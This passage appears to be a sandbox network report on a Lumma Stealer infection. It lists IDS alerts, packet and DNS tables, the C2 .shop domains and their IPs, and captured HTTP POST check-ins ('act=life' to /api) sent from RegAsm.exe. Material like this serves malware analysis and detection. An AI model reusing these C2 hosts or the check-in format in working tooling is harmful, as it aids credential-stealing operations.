2024-09-26T09:52:11.097484+0200 | 2056157 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) | 1 | 192.168.2.4 | 58444 | 104.21.58.182 | 443 | TCP
2024-09-26T09:52:11.567762+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 58444 | 104.21.58.182 | 443 | TCP
2024-09-26T09:52:11.567762+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 58444 | 104.21.58.182 | 443 | TCP
2024-09-26T09:52:11.569455+0200 | 2056154 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) | 1 | 192.168.2.4 | 53726 | 1.1.1.1 | 53 | UDP
2024-09-26T09:52:12.055505+0200 | 2056155 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) | 1 | 192.168.2.4 | 58445 | 188.114.97.3 | 443 | TCP
2024-09-26T09:52:12.512577+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 58445 | 188.114.97.3 | 443 | TCP
2024-09-26T09:52:12.512577+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 58445 | 188.114.97.3 | 443 | TCP
2024-09-26T09:52:12.513950+0200 | 2056152 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) | 1 | 192.168.2.4 | 53338 | 1.1.1.1 | 53 | UDP
2024-09-26T09:52:12.996046+0200 | 2056153 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) | 1 | 192.168.2.4 | 58446 | 188.114.96.3 | 443 | TCP
2024-09-26T09:52:13.467807+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 58446 | 188.114.96.3 | 443 | TCP
2024-09-26T09:52:13.467807+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 58446 | 188.114.96.3 | 443 | TCP
2024-09-26T09:52:13.469353+0200 | 2056150 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) | 1 | 192.168.2.4 | 64447 | 1.1.1.1 | 53 | UDP
2024-09-26T09:52:13.943312+0200 | 2056151 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) | 1 | 192.168.2.4 | 58447 | 104.21.77.130 | 443 | TCP
2024-09-26T09:52:14.417603+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 58447 | 104.21.77.130 | 443 | TCP
2024-09-26T09:52:14.417603+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 58447 | 104.21.77.130 | 443 | TCP
2024-09-26T09:52:16.841999+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 58449 | 172.67.189.2 | 443 | TCP
2024-09-26T09:52:16.841999+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 58449 | 172.67.189.2 | 443 | TCP
                                                                Sep 26, 2024 09:52:10.618432045 CEST58443443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:10.618437052 CEST44358443188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:10.635591030 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:10.635704041 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:10.635813951 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:10.636113882 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:10.636142969 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.097271919 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.097484112 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.098959923 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.098992109 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.099246025 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.100389004 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.100429058 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.100517988 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.567774057 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.567866087 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.567938089 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.568167925 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.568197966 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.568213940 CEST58444443192.168.2.4104.21.58.182
                                                                Sep 26, 2024 09:52:11.568222046 CEST44358444104.21.58.182192.168.2.4
                                                                Sep 26, 2024 09:52:11.583832026 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:11.583856106 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:11.583940029 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:11.584225893 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:11.584235907 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.055355072 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.055505037 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.057269096 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.057284117 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.057506084 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.058676958 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.058676958 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.058765888 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.512480974 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.512564898 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.512732983 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.512907028 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.512907028 CEST58445443192.168.2.4188.114.97.3
                                                                Sep 26, 2024 09:52:12.512921095 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.512926102 CEST44358445188.114.97.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.529490948 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.529534101 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.529850006 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.529902935 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.529911041 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.995942116 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.996046066 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.997726917 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.997739077 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.998158932 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:12.999403954 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.999425888 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:12.999475002 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:13.467782974 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:13.467864037 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:13.467915058 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:13.468043089 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:13.468060017 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:13.468070030 CEST58446443192.168.2.4188.114.96.3
                                                                Sep 26, 2024 09:52:13.468075991 CEST44358446188.114.96.3192.168.2.4
                                                                Sep 26, 2024 09:52:13.483549118 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.483597994 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:13.483670950 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.484085083 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.484097004 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:13.943201065 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:13.943311930 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.946155071 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.946166992 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:13.946417093 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:13.947573900 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.947616100 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:13.947649002 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:14.417603970 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:14.417714119 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:14.417798042 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:14.417922020 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:14.417973042 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:14.418004036 CEST58447443192.168.2.4104.21.77.130
                                                                Sep 26, 2024 09:52:14.418020964 CEST44358447104.21.77.130192.168.2.4
                                                                Sep 26, 2024 09:52:14.426839113 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:14.426933050 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:14.427021980 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:14.427283049 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:14.427318096 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.081146002 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.081363916 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.083007097 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.083024979 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.083446026 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.084763050 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.127412081 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.598932028 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.598992109 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.599037886 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.599121094 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.599158049 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.599175930 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.599216938 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.890916109 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.890950918 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.890999079 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891004086 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891037941 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891052008 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891072989 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891093016 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891155005 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891206980 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891233921 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891272068 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891278028 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891313076 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891352892 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891547918 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891561985 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.891577959 CEST58448443192.168.2.4104.102.49.254
                                                                Sep 26, 2024 09:52:15.891582966 CEST44358448104.102.49.254192.168.2.4
                                                                Sep 26, 2024 09:52:15.909923077 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:15.909967899 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:15.910048008 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:15.910383940 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:15.910396099 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.404989958 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.405065060 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.406891108 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.406898975 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.407124996 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.408201933 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.408235073 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.408262968 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.842016935 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.842117071 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.842195988 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.842317104 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.842338085 CEST44358449172.67.189.2192.168.2.4
                                                                Sep 26, 2024 09:52:16.842354059 CEST58449443192.168.2.4172.67.189.2
                                                                Sep 26, 2024 09:52:16.842359066 CEST44358449172.67.189.2192.168.2.4
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Sep 26, 2024 09:52:06.643739939 CEST6314853192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:06.721266985 CEST53631481.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:06.724512100 CEST6060253192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:06.733890057 CEST53606021.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:07.792671919 CEST5281053192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:07.805356979 CEST53528101.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:08.773381948 CEST6084253192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:08.786127090 CEST53608421.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:09.685195923 CEST5589253192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:09.699177980 CEST53558921.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:10.620207071 CEST6459853192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:10.633261919 CEST53645981.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:11.569454908 CEST5372653192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:11.583125114 CEST53537261.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:12.513950109 CEST5333853192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:12.528748035 CEST53533381.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:13.469352961 CEST6444753192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:13.482624054 CEST53644471.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:14.419151068 CEST6032053192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:14.426199913 CEST53603201.1.1.1192.168.2.4
                                                                Sep 26, 2024 09:52:15.894535065 CEST5131953192.168.2.41.1.1.1
                                                                Sep 26, 2024 09:52:15.908334970 CEST53513191.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 26, 2024 09:52:06.643739939 CEST | 192.168.2.4 | 1.1.1.1 | 0x73c6 | Standard query (0) | lootebarrkeyn.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:06.724512100 CEST | 192.168.2.4 | 1.1.1.1 | 0x8cea | Standard query (0) | gutterydhowi.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:07.792671919 CEST | 192.168.2.4 | 1.1.1.1 | 0x68cb | Standard query (0) | ghostreedmnu.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:08.773381948 CEST | 192.168.2.4 | 1.1.1.1 | 0xcd28 | Standard query (0) | offensivedzvju.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:09.685195923 CEST | 192.168.2.4 | 1.1.1.1 | 0xef53 | Standard query (0) | vozmeatillu.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:10.620207071 CEST | 192.168.2.4 | 1.1.1.1 | 0x1c9e | Standard query (0) | drawzhotdog.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:11.569454908 CEST | 192.168.2.4 | 1.1.1.1 | 0xfd4f | Standard query (0) | fragnantbui.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:12.513950109 CEST | 192.168.2.4 | 1.1.1.1 | 0xdc89 | Standard query (0) | stogeneratmns.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:13.469352961 CEST | 192.168.2.4 | 1.1.1.1 | 0xff22 | Standard query (0) | reinforcenh.shop | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:14.419151068 CEST | 192.168.2.4 | 1.1.1.1 | 0x248b | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:15.894535065 CEST | 192.168.2.4 | 1.1.1.1 | 0x481c | Standard query (0) | performenj.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 26, 2024 09:52:06.721266985 CEST | 1.1.1.1 | 192.168.2.4 | 0x73c6 | Name error (3) | lootebarrkeyn.shop | none | none | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:06.733890057 CEST | 1.1.1.1 | 192.168.2.4 | 0x8cea | No error (0) | gutterydhowi.shop |  | 104.21.4.136 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:06.733890057 CEST | 1.1.1.1 | 192.168.2.4 | 0x8cea | No error (0) | gutterydhowi.shop |  | 172.67.132.32 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:07.805356979 CEST | 1.1.1.1 | 192.168.2.4 | 0x68cb | No error (0) | ghostreedmnu.shop |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:07.805356979 CEST | 1.1.1.1 | 192.168.2.4 | 0x68cb | No error (0) | ghostreedmnu.shop |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:08.786127090 CEST | 1.1.1.1 | 192.168.2.4 | 0xcd28 | No error (0) | offensivedzvju.shop |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:08.786127090 CEST | 1.1.1.1 | 192.168.2.4 | 0xcd28 | No error (0) | offensivedzvju.shop |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:09.699177980 CEST | 1.1.1.1 | 192.168.2.4 | 0xef53 | No error (0) | vozmeatillu.shop |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:09.699177980 CEST | 1.1.1.1 | 192.168.2.4 | 0xef53 | No error (0) | vozmeatillu.shop |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:10.633261919 CEST | 1.1.1.1 | 192.168.2.4 | 0x1c9e | No error (0) | drawzhotdog.shop |  | 104.21.58.182 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:10.633261919 CEST | 1.1.1.1 | 192.168.2.4 | 0x1c9e | No error (0) | drawzhotdog.shop |  | 172.67.162.108 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:11.583125114 CEST | 1.1.1.1 | 192.168.2.4 | 0xfd4f | No error (0) | fragnantbui.shop |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:11.583125114 CEST | 1.1.1.1 | 192.168.2.4 | 0xfd4f | No error (0) | fragnantbui.shop |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:12.528748035 CEST | 1.1.1.1 | 192.168.2.4 | 0xdc89 | No error (0) | stogeneratmns.shop |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:12.528748035 CEST | 1.1.1.1 | 192.168.2.4 | 0xdc89 | No error (0) | stogeneratmns.shop |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:13.482624054 CEST | 1.1.1.1 | 192.168.2.4 | 0xff22 | No error (0) | reinforcenh.shop |  | 104.21.77.130 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:13.482624054 CEST | 1.1.1.1 | 192.168.2.4 | 0xff22 | No error (0) | reinforcenh.shop |  | 172.67.208.139 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:14.426199913 CEST | 1.1.1.1 | 192.168.2.4 | 0x248b | No error (0) | steamcommunity.com |  | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:15.908334970 CEST | 1.1.1.1 | 192.168.2.4 | 0x481c | No error (0) | performenj.shop |  | 172.67.189.2 | A (IP address) | IN (0x0001) | false
Sep 26, 2024 09:52:15.908334970 CEST | 1.1.1.1 | 192.168.2.4 | 0x481c | No error (0) | performenj.shop |  | 104.21.51.224 | A (IP address) | IN (0x0001) | false
• gutterydhowi.shop
• ghostreedmnu.shop
• offensivedzvju.shop
• vozmeatillu.shop
• drawzhotdog.shop
• fragnantbui.shop
• stogeneratmns.shop
• reinforcenh.shop
• steamcommunity.com
• performenj.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 58440 | 104.21.4.136 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp: 2024-09-26 07:52:07 UTC | Bytes transferred: 264 | Direction: OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: gutterydhowi.shop

Timestamp: 2024-09-26 07:52:07 UTC | Bytes transferred: 8 | Direction: OUT
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life

Timestamp: 2024-09-26 07:52:07 UTC | Bytes transferred: 772 | Direction: IN
HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 07:52:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hhpj6pbas8olv8ignnjbevr411; expires=Mon, 20 Jan 2025 01:38:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uFOA0F2DyOGIww77PiXIGBillS3eG99nIlgUjO6incPOOUbwXEQ4e0OF7z%2BOOSWVkcoH7khPVMtGPhyb5vMDOLhDtCpnD9EXhkr1wNottrxYz1GrrcIgTjtPa6o2QOPkm7%2FQgw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c91ac35ea8d72a4-EWR

Timestamp: 2024-09-26 07:52:07 UTC | Bytes transferred: 15 | Direction: IN
Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12

Timestamp: 2024-09-26 07:52:07 UTC | Bytes transferred: 5 | Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 58441 | 188.114.97.3 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 07:52:08 UTC | 264 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: ghostreedmnu.shop
2024-09-26 07:52:08 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-09-26 07:52:08 UTC | 772 | IN | HTTP/1.1 200 OK
    Date: Thu, 26 Sep 2024 07:52:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=1pebasua4uouqst65c85n2vusp; expires=Mon, 20 Jan 2025 01:38:47 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYJ7F0YxVOqmkLvk6nfPmPSQTU7mpOXxx53NJ1tbGY620rtk3zvRYG5eOPzBZniXKFjNlc%2BpLb3CsAX4puqDSposZ6yeYyvC86Cvz0mhKzAUfN6UJPdMKIxEPQdbTkETY%2Fe7cg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c91ac3c19217d0e-EWR
2024-09-26 07:52:08 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-09-26 07:52:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 58442 | 188.114.96.3 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 07:52:09 UTC | 266 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: offensivedzvju.shop
2024-09-26 07:52:09 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-09-26 07:52:09 UTC | 770 | IN | HTTP/1.1 200 OK
    Date: Thu, 26 Sep 2024 07:52:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=dbu7jp4ns5b94iuqm9rv1970nj; expires=Mon, 20 Jan 2025 01:38:48 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
